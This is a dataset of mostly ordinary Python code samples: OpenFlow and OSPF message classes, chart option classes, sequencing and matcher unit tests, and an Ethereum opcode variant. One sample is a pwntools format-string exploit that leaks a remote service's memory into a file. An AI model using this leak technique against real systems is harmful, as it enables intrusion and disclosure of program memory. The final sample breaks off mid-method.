code
stringlengths
281
23.7M
@_set_msg_type(ofproto.OFPT_QUEUE_GET_CONFIG_REQUEST)
class OFPQueueGetConfigRequest(MsgBase):
    """Queue configuration request message (OFPT_QUEUE_GET_CONFIG_REQUEST).

    NOTE(review): the source had ``_set_msg_type(...)`` juxtaposed before
    ``class`` (a syntax error); the ``@`` decorator marker is restored here.
    """

    def __init__(self, datapath, port):
        """Build a request for the queue configuration of *port*."""
        super(OFPQueueGetConfigRequest, self).__init__(datapath)
        self.port = port

    def _serialize_body(self):
        # Pack only the port number after the common OpenFlow header.
        msg_pack_into(ofproto.OFP_QUEUE_GET_CONFIG_REQUEST_PACK_STR,
                      self.buf, ofproto.OFP_HEADER_SIZE, self.port)
class CommConfigs(Options):
    """Chart options shared ("commons") by every dataset of the component.

    NOTE(review): the duplicate ``def`` pairs in the source were clearly
    ``@property`` getter/setter pairs with the decorators stripped (as
    written, each setter silently shadowed its getter); the decorators are
    restored here.
    """

    def _get_commons(self, name: str = None):
        """Read a common option; the key defaults to the caller's name."""
        return self.component.options['commons'].get(
            name or sys._getframe().f_back.f_code.co_name)

    def _set_commons(self, value: Any, name: str = None):
        """Write a common option and mirror it onto every attached dataset."""
        name = name or sys._getframe().f_back.f_code.co_name
        for ds in self.component._datasets:
            ds._attrs[name] = value
        self.component.options['commons'][name] = value

    def update(self, vals: dict):
        """Set several common options at once from a mapping."""
        for k, v in vals.items():
            self._set_commons(v, k)

    def attr(self, name: str, value: Any = None):
        """Get (when *value* is None) or set the named common option."""
        if value is None:
            return self._get_commons(name)
        self._set_commons(value, name)

    @property
    def borderWidth(self):
        return self._get_commons()

    @borderWidth.setter
    def borderWidth(self, num: int):
        self._set_commons(num)

    @property
    def borderRadius(self):
        return self._get_commons()

    @borderRadius.setter
    def borderRadius(self, num: int):
        self._set_commons(num)

    @property
    def borderSkipped(self):
        return self._get_commons()

    @borderSkipped.setter
    def borderSkipped(self, value: Union[bool, str]):
        self._set_commons(value)

    @property
    def clip(self):
        return self._get_commons()

    @clip.setter
    def clip(self, value: Any):
        self._set_commons(value)

    @property
    def hoverBackgroundColor(self):
        return self._get_commons()

    @hoverBackgroundColor.setter
    def hoverBackgroundColor(self, value: str):
        self._set_commons(value)

    @property
    def hoverBorderColor(self):
        return self._get_commons()

    @hoverBorderColor.setter
    def hoverBorderColor(self, value: str):
        self._set_commons(value)

    @property
    def hoverBorderWidth(self):
        return self._get_commons()

    @hoverBorderWidth.setter
    def hoverBorderWidth(self, num: int):
        self._set_commons(num)

    @property
    def hoverBorderRadius(self):
        return self._get_commons()

    @hoverBorderRadius.setter
    def hoverBorderRadius(self, num: int):
        self._set_commons(num)

    @property
    def hoverOffset(self):
        return self._get_commons()

    @hoverOffset.setter
    def hoverOffset(self, num: int):
        self._set_commons(num)

    @property
    def order(self):
        return self._get_commons()

    @order.setter
    def order(self, value: str):
        self._set_commons(value)

    @property
    def offset(self):
        return self._get_commons()

    @offset.setter
    def offset(self, values: Any):
        self._set_commons(values)

    @property
    def pointStyle(self):
        return self._get_commons()

    @pointStyle.setter
    def pointStyle(self, value: str):
        self._set_commons(value)

    @property
    def stack(self):
        return self._get_commons()

    @stack.setter
    def stack(self, value: str):
        self._set_commons(value)
@_type(OSPF_MSG_DB_DESC)
class OSPFDBDesc(OSPFMessage):
    """OSPF Database Description packet.

    NOTE(review): the source had ``_type(OSPF_MSG_DB_DESC)`` juxtaposed
    before ``class`` (a syntax error) and ``parser(cls, ...)`` with no
    decorator; the ``@`` marker and ``@classmethod`` are restored here.
    """

    _PACK_STR = '!HBBI'  # mtu (H), options (B), I/M/MS flags (B), DD sequence (I)
    _PACK_LEN = struct.calcsize(_PACK_STR)
    _MIN_LEN = (OSPFMessage._HDR_LEN + _PACK_LEN)

    def __init__(self, length=None, router_id='0.0.0.0', area_id='0.0.0.0',
                 au_type=1, authentication=0, checksum=None, version=_VERSION,
                 mtu=1500, options=0, i_flag=0, m_flag=0, ms_flag=0,
                 sequence_number=0, lsa_headers=None):
        lsa_headers = lsa_headers if lsa_headers else []
        super(OSPFDBDesc, self).__init__(OSPF_MSG_DB_DESC, length, router_id,
                                         area_id, au_type, authentication,
                                         checksum, version)
        self.mtu = mtu
        self.options = options
        self.i_flag = i_flag      # Init bit
        self.m_flag = m_flag      # More bit
        self.ms_flag = ms_flag    # Master/Slave bit
        self.sequence_number = sequence_number
        self.lsa_headers = lsa_headers

    @classmethod
    def parser(cls, buf):
        """Parse the DB-Desc body and return kwargs for __init__."""
        (mtu, options, flags, sequence_number) = struct.unpack_from(
            cls._PACK_STR, six.binary_type(buf))
        # Flags byte layout: ... I(bit2) M(bit1) MS(bit0).
        i_flag = (flags >> 2) & 1
        m_flag = (flags >> 1) & 1
        ms_flag = flags & 1
        lsahdrs = []
        buf = buf[cls._PACK_LEN:]
        # The remainder of the packet is a run of LSA headers.
        while buf:
            (kwargs, buf) = LSAHeader.parser(buf)
            lsahdrs.append(LSAHeader(**kwargs))
        return {'mtu': mtu, 'options': options, 'i_flag': i_flag,
                'm_flag': m_flag, 'ms_flag': ms_flag,
                'sequence_number': sequence_number, 'lsa_headers': lsahdrs}

    def serialize_tail(self):
        """Serialize the body; header fields are handled by the base class."""
        # The flag bits are disjoint, so combining with | is the clear idiom
        # (the original used ^, which is equivalent on disjoint bits).
        flags = (((self.i_flag & 1) << 2) | ((self.m_flag & 1) << 1) |
                 (self.ms_flag & 1))
        head = bytearray(struct.pack(self._PACK_STR, self.mtu, self.options,
                                     flags, self.sequence_number))
        try:
            return head + reduce((lambda a, b: a + b),
                                 (hdr.serialize() for hdr in self.lsa_headers))
        except TypeError:
            # reduce() raises TypeError on an empty sequence: no LSA headers.
            return head
def dump_memory(start_addr=0x08048000, end_addr=0x08049000):
    """Leak a memory range from a remote service via a format-string bug
    and save it to ``code.bin``.

    NOTE(review): the source called ``dump(, )`` with the addresses missing
    (a syntax error). The range is now a parameter pair; the defaults are a
    typical 32-bit ELF load address — TODO confirm the real target range.
    This is a Python-2 pwntools script (``str`` payloads, ``encode('hex')``).
    """
    def dump(start, end):
        result = ''
        while start < end:
            # One fresh connection per leak: the format string prints the
            # NUL-terminated string at the address appended after '.AAA'.
            io = remote('127.0.0.1', '10001')
            io.recvline()
            payload = '%9$s.AAA' + p32(start)
            io.sendline(payload)
            data = io.recvuntil('.AAA')[:-4]
            if data == '':
                # %s printed nothing: the byte at this address is NUL.
                data = '\x00'
            log.info('leaking: 0x%x --> %s' % (start, data.encode('hex')))
            result += data
            start += len(data)
            io.close()
        return result

    code_bin = dump(start_addr, end_addr)
    # The with-block closes the file; the original's extra f.close() dropped.
    with open('code.bin', 'wb') as f:
        f.write(code_bin)
class OptionSeriesPolygonSonificationDefaultinstrumentoptionsMappingVolume(Options):
    """Volume mapping options for the polygon-series sonification instrument.

    NOTE(review): the duplicate ``def`` pairs in the source were clearly
    ``@property`` getter/setter pairs with the decorators stripped; they
    are restored here.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesHistogramSonificationContexttracksMappingTremoloSpeed(Options):
    """Tremolo-speed mapping options for histogram-series sonification tracks.

    NOTE(review): the duplicate ``def`` pairs in the source were clearly
    ``@property`` getter/setter pairs with the decorators stripped; they
    are restored here.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class TestVerifyRunAgainstBcl2fastq2SampleSheetNoLaneSplitting(unittest.TestCase):
    # Tests verify_run_against_sample_sheet / list_missing_fastqs against a
    # mocked bcl2fastq2 output directory created with no_lane_splitting=True.

    def setUp(self):
        # Build a mock run with two projects ('AB', 'CDE'), two samples each,
        # plus undetermined reads, and a matching sample sheet on disk.
        self.top_dir = tempfile.mkdtemp()
        self.mock_illumina_data = MockIlluminaData('test.MockIlluminaData', 'bcl2fastq2', paired_end=True, no_lane_splitting=True, top_dir=self.top_dir)
        self.mock_illumina_data.add_fastq_batch('AB', 'AB1', 'AB1_S1')
        self.mock_illumina_data.add_fastq_batch('AB', 'AB2', 'AB2_S2')
        self.mock_illumina_data.add_fastq_batch('CDE', 'CDE3', 'CDE3_S3')
        self.mock_illumina_data.add_fastq_batch('CDE', 'CDE4', 'CDE4_S4')
        self.mock_illumina_data.add_undetermined()
        self.mock_illumina_data.create()
        # Write the sample sheet to a temp file (content must match the mock).
        (fno, self.sample_sheet) = tempfile.mkstemp()
        fp = os.fdopen(fno, 'w')
        fp.write('[Header]\n\n[Reads]\n\n[Settings]\n\n[Data]\nSample_ID,Sample_Name,Sample_Plate,Sample_Well,I7_Index_ID,index,Sample_Project,Description\nAB1,AB1,,,N0,GCCAAT,AB,\nAB2,AB2,,,N1,AGTCAA,AB,\nCDE3,CDE3,,,N2,GCCAAT,CDE,\nCDE4,CDE4,,,N3,AGTCAA,CDE,')
        fp.close()

    def tearDown(self):
        # Remove mock run dir, its parent temp dir, and the sample sheet.
        if (self.mock_illumina_data is not None):
            self.mock_illumina_data.remove()
        os.rmdir(self.top_dir)
        os.remove(self.sample_sheet)

    def test_verify_run_against_sample_sheet(self):
        # Complete run: no fastqs missing, verification succeeds.
        illumina_data = IlluminaData(self.mock_illumina_data.dirn)
        self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), [])
        self.assertTrue(verify_run_against_sample_sheet(illumina_data, self.sample_sheet))

    def test_verify_run_against_sample_sheet_with_missing_project(self):
        # Delete the whole 'AB' project dir: all four AB fastqs reported missing.
        shutil.rmtree(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB'))
        illumina_data = IlluminaData(self.mock_illumina_data.dirn)
        self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), ['AB/AB1_S1_R1_001.fastq.gz', 'AB/AB1_S1_R2_001.fastq.gz', 'AB/AB2_S2_R1_001.fastq.gz', 'AB/AB2_S2_R2_001.fastq.gz'])
        self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet))

    def test_verify_run_against_sample_sheet_with_missing_sample(self):
        # Delete only the AB1 fastqs: just that sample's R1/R2 reported missing.
        for f in os.listdir(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB')):
            print(f)
            if f.startswith('AB1'):
                fq = os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'AB', f)
                print(('Removing %s' % fq))
                os.remove(fq)
        illumina_data = IlluminaData(self.mock_illumina_data.dirn)
        self.assertEqual(list_missing_fastqs(illumina_data, self.sample_sheet), ['AB/AB1_S1_R1_001.fastq.gz', 'AB/AB1_S1_R2_001.fastq.gz'])
        self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet))

    def test_verify_run_against_sample_sheet_with_missing_fastq(self):
        # Delete a single R2 fastq: verification fails.
        os.remove(os.path.join(self.mock_illumina_data.dirn, self.mock_illumina_data.unaligned_dir, 'CDE', 'CDE4_S4_R2_001.fastq.gz'))
        illumina_data = IlluminaData(self.mock_illumina_data.dirn)
        self.assertFalse(verify_run_against_sample_sheet(illumina_data, self.sample_sheet))
class GenericTestCase(testslide.TestCase):
    """Exercises the generic testslide matchers against falsy/truthy values."""

    def testAnyFalsey(self):
        # AnyFalsey matches exactly the falsy values.
        for value in ({}, [], (), '', None, 0):
            self.assertEqual(testslide.matchers.AnyFalsey(), value)
        for value in ({'a': 'b'}, ['a', 'b'], ('a', 'b'), 'a', 1):
            self.assertNotEqual(testslide.matchers.AnyFalsey(), value)

    def testAnyTruthy(self):
        # AnyTruthy is the exact complement of AnyFalsey.
        for value in ({}, [], (), '', None, 0):
            self.assertNotEqual(testslide.matchers.AnyTruthy(), value)
        for value in ({'a': 'b'}, ['a', 'b'], ('a', 'b'), 'a', 1):
            self.assertEqual(testslide.matchers.AnyTruthy(), value)

    def testAny(self):
        # Any matches everything, falsy or truthy.
        for value in ({}, [], (), '', None, 0,
                      {'a': 'b'}, ['a', 'b'], ('a', 'b'), 'a', 1):
            self.assertEqual(testslide.matchers.Any(), value)

    def testAnyInstanceOf(self):
        # Matches by isinstance; rejects a non-type argument.
        self.assertEqual(testslide.matchers.AnyInstanceOf(str), 'durrdurr')
        self.assertNotEqual(testslide.matchers.AnyInstanceOf(str), 7)
        with self.assertRaises(ValueError):
            testslide.matchers.AnyInstanceOf(2)

    def testAnyWithCall(self):
        # Matches when the supplied predicate returns true for the value.
        self.assertEqual(
            testslide.matchers.AnyWithCall(lambda x: 'b' in x), 'abc')
        self.assertNotEqual(
            testslide.matchers.AnyWithCall(lambda x: 'd' in x), 'abc')
class Create2EIP2929(Create2):
    """CREATE2 opcode variant with EIP-2929 access-list accounting."""

    def generate_contract_address(self, stack_data: CreateOpcodeStackData, call_data: bytes, computation: ComputationAPI) -> Address:
        """Derive the CREATE2 address and mark it warm in the state."""
        contract_address = super().generate_contract_address(
            stack_data, call_data, computation)
        # The newly derived address is recorded as warm (accessed) so that
        # subsequent touches are charged the reduced EIP-2929 gas cost.
        computation.state.mark_address_warm(contract_address)
        return contract_address
class OFPMatch(StringifyMixin):
    """OpenFlow flow match built from OXM TLV fields.

    Supports two construction styles: the kwargs/new API (stored in
    ``_fields2`` as (name, value-or-(value, mask)) pairs) and the legacy
    ``set_*`` API (stored via ``_wc``/``_flow`` and rendered on serialize).

    NOTE(review): ``parser``/``from_jsondict`` were written with a ``cls``
    first parameter and ``parser_old`` with no ``self`` — the
    ``@classmethod``/``@staticmethod`` decorators were clearly stripped in
    extraction and are restored here (``parser`` itself calls
    ``cls.parser_old(match, ...)``, which only works as a staticmethod).
    """

    def __init__(self, type_=None, length=None, _ordered_fields=None, **kwargs):
        super(OFPMatch, self).__init__()
        self._wc = FlowWildcards()
        self._flow = Flow()
        self.fields = []
        self.type = ofproto.OFPMT_OXM
        self.length = length
        if _ordered_fields is not None:
            # Caller supplies a pre-ordered field list; kwargs must be empty.
            assert not kwargs
            self._fields2 = _ordered_fields
        else:
            # Normalize user kwargs into OXM tuples, sort by field number,
            # then convert back to user-level (name, value) pairs.
            kwargs = dict(ofproto.oxm_normalize_user(k, v)
                          for (k, v) in kwargs.items())
            fields = [ofproto.oxm_from_user(k, v) for (k, v) in kwargs.items()]
            fields.sort(key=(lambda x: (x[0][0] if isinstance(x[0], tuple)
                                        else x[0])))
            self._fields2 = [ofproto.oxm_to_user(n, v, m)
                             for (n, v, m) in fields]

    def __getitem__(self, key):
        return dict(self._fields2)[key]

    def __contains__(self, key):
        return key in dict(self._fields2)

    def iteritems(self):
        return iter(dict(self._fields2).items())

    def items(self):
        return self._fields2

    def get(self, key, default=None):
        return dict(self._fields2).get(key, default)

    def stringify_attrs(self):
        yield ('oxm_fields', dict(self._fields2))

    def to_jsondict(self):
        """Return a JSON-style dict; old-API matches are round-tripped
        through serialize/parse to obtain the new-API field list."""
        if self._composed_with_old_api():
            o2 = OFPMatch()
            o2.fields = self.fields[:]
            buf = bytearray()
            o2.serialize(buf, 0)
            o = OFPMatch.parser(six.binary_type(buf), 0)
        else:
            o = self
        body = {'oxm_fields': [ofproto.oxm_to_jsondict(k, uv)
                               for (k, uv) in o._fields2],
                'length': o.length,
                'type': o.type}
        return {self.__class__.__name__: body}

    @classmethod
    def from_jsondict(cls, dict_):
        """Rebuild a match from to_jsondict() output (round-trips through
        the wire format to normalize it)."""
        fields = [ofproto.oxm_from_jsondict(f) for f in dict_['oxm_fields']]
        o = OFPMatch(_ordered_fields=fields)
        buf = bytearray()
        o.serialize(buf, 0)
        return OFPMatch.parser(six.binary_type(buf), 0)

    def __str__(self):
        # Same old-API normalization as to_jsondict before stringifying.
        if self._composed_with_old_api():
            o2 = OFPMatch()
            o2.fields = self.fields[:]
            buf = bytearray()
            o2.serialize(buf, 0)
            o = OFPMatch.parser(six.binary_type(buf), 0)
        else:
            o = self
        return super(OFPMatch, o).__str__()

    __repr__ = __str__

    def append_field(self, header, value, mask=None):
        self.fields.append(OFPMatchField.make(header, value, mask))

    def _composed_with_old_api(self):
        # Old API detected when legacy fields/wildcards were populated but
        # the new-API field list was not.
        return ((self.fields and (not self._fields2)) or
                (self._wc.__dict__ != FlowWildcards().__dict__))

    def serialize(self, buf, offset):
        """Serialize the match into buf at offset; returns padded length."""
        if self._composed_with_old_api():
            return self.serialize_old(buf, offset)
        fields = [ofproto.oxm_from_user(k, uv) for (k, uv) in self._fields2]
        hdr_pack_str = '!HH'
        field_offset = offset + struct.calcsize(hdr_pack_str)
        for (n, value, mask) in fields:
            field_offset += ofproto.oxm_serialize(n, value, mask, buf,
                                                  field_offset)
        length = field_offset - offset
        msg_pack_into(hdr_pack_str, buf, offset, ofproto.OFPMT_OXM, length)
        self.length = length
        # Matches are padded to a multiple of 8 bytes.
        pad_len = utils.round_up(length, 8) - length
        msg_pack_into('%dx' % pad_len, buf, field_offset)
        return length + pad_len

    def serialize_old(self, buf, offset):
        """Serialize a legacy (set_* API) match: convert each wildcarded
        flow attribute into an OXM field, then write header + fields."""
        if hasattr(self, '_serialized'):
            raise Exception('serializing an OFPMatch composed with old API '
                            'multiple times is not supported')
        self._serialized = True
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PORT):
            self.append_field(ofproto.OXM_OF_IN_PORT, self._flow.in_port)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IN_PHY_PORT):
            self.append_field(ofproto.OXM_OF_IN_PHY_PORT,
                              self._flow.in_phy_port)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_METADATA):
            # An all-ones mask means an exact match: use the unmasked OXM.
            if self._wc.metadata_mask == UINT64_MAX:
                header = ofproto.OXM_OF_METADATA
            else:
                header = ofproto.OXM_OF_METADATA_W
            self.append_field(header, self._flow.metadata,
                              self._wc.metadata_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_DST):
            if self._wc.dl_dst_mask:
                header = ofproto.OXM_OF_ETH_DST_W
            else:
                header = ofproto.OXM_OF_ETH_DST
            self.append_field(header, self._flow.dl_dst, self._wc.dl_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_SRC):
            if self._wc.dl_src_mask:
                header = ofproto.OXM_OF_ETH_SRC_W
            else:
                header = ofproto.OXM_OF_ETH_SRC
            self.append_field(header, self._flow.dl_src, self._wc.dl_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ETH_TYPE):
            self.append_field(ofproto.OXM_OF_ETH_TYPE, self._flow.dl_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_VID):
            if self._wc.vlan_vid_mask == UINT16_MAX:
                header = ofproto.OXM_OF_VLAN_VID
            else:
                header = ofproto.OXM_OF_VLAN_VID_W
            self.append_field(header, self._flow.vlan_vid,
                              self._wc.vlan_vid_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_VLAN_PCP):
            self.append_field(ofproto.OXM_OF_VLAN_PCP, self._flow.vlan_pcp)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_DSCP):
            self.append_field(ofproto.OXM_OF_IP_DSCP, self._flow.ip_dscp)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_ECN):
            self.append_field(ofproto.OXM_OF_IP_ECN, self._flow.ip_ecn)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IP_PROTO):
            self.append_field(ofproto.OXM_OF_IP_PROTO, self._flow.ip_proto)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_SRC):
            if self._wc.ipv4_src_mask == UINT32_MAX:
                header = ofproto.OXM_OF_IPV4_SRC
            else:
                header = ofproto.OXM_OF_IPV4_SRC_W
            self.append_field(header, self._flow.ipv4_src,
                              self._wc.ipv4_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV4_DST):
            if self._wc.ipv4_dst_mask == UINT32_MAX:
                header = ofproto.OXM_OF_IPV4_DST
            else:
                header = ofproto.OXM_OF_IPV4_DST_W
            self.append_field(header, self._flow.ipv4_dst,
                              self._wc.ipv4_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_SRC):
            self.append_field(ofproto.OXM_OF_TCP_SRC, self._flow.tcp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_TCP_DST):
            self.append_field(ofproto.OXM_OF_TCP_DST, self._flow.tcp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_SRC):
            self.append_field(ofproto.OXM_OF_UDP_SRC, self._flow.udp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_UDP_DST):
            self.append_field(ofproto.OXM_OF_UDP_DST, self._flow.udp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_SRC):
            self.append_field(ofproto.OXM_OF_SCTP_SRC, self._flow.sctp_src)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_SCTP_DST):
            self.append_field(ofproto.OXM_OF_SCTP_DST, self._flow.sctp_dst)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_TYPE):
            self.append_field(ofproto.OXM_OF_ICMPV4_TYPE,
                              self._flow.icmpv4_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV4_CODE):
            self.append_field(ofproto.OXM_OF_ICMPV4_CODE,
                              self._flow.icmpv4_code)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_OP):
            self.append_field(ofproto.OXM_OF_ARP_OP, self._flow.arp_op)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SPA):
            if self._wc.arp_spa_mask == UINT32_MAX:
                header = ofproto.OXM_OF_ARP_SPA
            else:
                header = ofproto.OXM_OF_ARP_SPA_W
            self.append_field(header, self._flow.arp_spa,
                              self._wc.arp_spa_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_TPA):
            if self._wc.arp_tpa_mask == UINT32_MAX:
                header = ofproto.OXM_OF_ARP_TPA
            else:
                header = ofproto.OXM_OF_ARP_TPA_W
            self.append_field(header, self._flow.arp_tpa,
                              self._wc.arp_tpa_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_SHA):
            if self._wc.arp_sha_mask:
                header = ofproto.OXM_OF_ARP_SHA_W
            else:
                header = ofproto.OXM_OF_ARP_SHA
            self.append_field(header, self._flow.arp_sha,
                              self._wc.arp_sha_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ARP_THA):
            if self._wc.arp_tha_mask:
                header = ofproto.OXM_OF_ARP_THA_W
            else:
                header = ofproto.OXM_OF_ARP_THA
            self.append_field(header, self._flow.arp_tha,
                              self._wc.arp_tha_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_SRC):
            # IPv6 masks are sequences: non-empty means masked.
            if len(self._wc.ipv6_src_mask):
                header = ofproto.OXM_OF_IPV6_SRC_W
            else:
                header = ofproto.OXM_OF_IPV6_SRC
            self.append_field(header, self._flow.ipv6_src,
                              self._wc.ipv6_src_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_DST):
            if len(self._wc.ipv6_dst_mask):
                header = ofproto.OXM_OF_IPV6_DST_W
            else:
                header = ofproto.OXM_OF_IPV6_DST
            self.append_field(header, self._flow.ipv6_dst,
                              self._wc.ipv6_dst_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_FLABEL):
            if self._wc.ipv6_flabel_mask == UINT32_MAX:
                header = ofproto.OXM_OF_IPV6_FLABEL
            else:
                header = ofproto.OXM_OF_IPV6_FLABEL_W
            self.append_field(header, self._flow.ipv6_flabel,
                              self._wc.ipv6_flabel_mask)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_TYPE):
            self.append_field(ofproto.OXM_OF_ICMPV6_TYPE,
                              self._flow.icmpv6_type)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_ICMPV6_CODE):
            self.append_field(ofproto.OXM_OF_ICMPV6_CODE,
                              self._flow.icmpv6_code)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TARGET):
            self.append_field(ofproto.OXM_OF_IPV6_ND_TARGET,
                              self._flow.ipv6_nd_target)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_SLL):
            self.append_field(ofproto.OXM_OF_IPV6_ND_SLL,
                              self._flow.ipv6_nd_sll)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_IPV6_ND_TLL):
            self.append_field(ofproto.OXM_OF_IPV6_ND_TLL,
                              self._flow.ipv6_nd_tll)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_LABEL):
            self.append_field(ofproto.OXM_OF_MPLS_LABEL,
                              self._flow.mpls_label)
        if self._wc.ft_test(ofproto.OFPXMT_OFB_MPLS_TC):
            self.append_field(ofproto.OXM_OF_MPLS_TC, self._flow.mpls_tc)
        # Write the fields after the 4-byte match header, then patch the
        # header with the real length and add trailing padding to 8 bytes.
        field_offset = offset + 4
        for f in self.fields:
            f.serialize(buf, field_offset)
            field_offset += f.length
        length = field_offset - offset
        msg_pack_into('!HH', buf, offset, ofproto.OFPMT_OXM, length)
        pad_len = utils.round_up(length, 8) - length
        msg_pack_into('%dx' % pad_len, buf, field_offset)
        return length + pad_len

    @classmethod
    def parser(cls, buf, offset):
        """Parse a match from buf at offset into a new OFPMatch."""
        match = OFPMatch()
        (type_, length) = struct.unpack_from('!HH', buf, offset)
        match.type = type_
        match.length = length
        offset += 4
        length -= 4
        # Populate the legacy field list as well for old-API consumers.
        cls.parser_old(match, buf, offset, length)
        fields = []
        while length > 0:
            (n, value, mask, field_len) = ofproto.oxm_parse(buf, offset)
            (k, uv) = ofproto.oxm_to_user(n, value, mask)
            fields.append((k, uv))
            offset += field_len
            length -= field_len
        match._fields2 = fields
        return match

    @staticmethod
    def parser_old(match, buf, offset, length):
        """Parse the fields into the legacy OFPMatchField list."""
        while length > 0:
            field = OFPMatchField.parser(buf, offset)
            offset += field.length
            length -= field.length
            match.fields.append(field)

    # --- legacy set_* API: record the attribute in _flow and flag it in
    # --- the wildcard set; *_masked variants also record the mask.

    def set_in_port(self, port):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PORT)
        self._flow.in_port = port

    def set_in_phy_port(self, phy_port):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IN_PHY_PORT)
        self._flow.in_phy_port = phy_port

    def set_metadata(self, metadata):
        self.set_metadata_masked(metadata, UINT64_MAX)

    def set_metadata_masked(self, metadata, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_METADATA)
        self._wc.metadata_mask = mask
        self._flow.metadata = metadata & mask

    def set_dl_dst(self, dl_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
        self._flow.dl_dst = dl_dst

    def set_dl_dst_masked(self, dl_dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_DST)
        self._wc.dl_dst_mask = mask
        self._flow.dl_dst = mac.haddr_bitand(dl_dst, mask)

    def set_dl_src(self, dl_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
        self._flow.dl_src = dl_src

    def set_dl_src_masked(self, dl_src, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_SRC)
        self._wc.dl_src_mask = mask
        self._flow.dl_src = mac.haddr_bitand(dl_src, mask)

    def set_dl_type(self, dl_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ETH_TYPE)
        self._flow.dl_type = dl_type

    def set_vlan_vid_none(self):
        # Match packets with no VLAN tag at all.
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
        self._wc.vlan_vid_mask = UINT16_MAX
        self._flow.vlan_vid = ofproto.OFPVID_NONE

    def set_vlan_vid(self, vid):
        self.set_vlan_vid_masked(vid, UINT16_MAX)

    def set_vlan_vid_masked(self, vid, mask):
        # OFPVID_PRESENT must be set to match tagged packets.
        vid |= ofproto.OFPVID_PRESENT
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_VID)
        self._wc.vlan_vid_mask = mask
        self._flow.vlan_vid = vid

    def set_vlan_pcp(self, pcp):
        self._wc.ft_set(ofproto.OFPXMT_OFB_VLAN_PCP)
        self._flow.vlan_pcp = pcp

    def set_ip_dscp(self, ip_dscp):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_DSCP)
        self._flow.ip_dscp = ip_dscp

    def set_ip_ecn(self, ip_ecn):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_ECN)
        self._flow.ip_ecn = ip_ecn

    def set_ip_proto(self, ip_proto):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IP_PROTO)
        self._flow.ip_proto = ip_proto

    def set_ipv4_src(self, ipv4_src):
        self.set_ipv4_src_masked(ipv4_src, UINT32_MAX)

    def set_ipv4_src_masked(self, ipv4_src, mask):
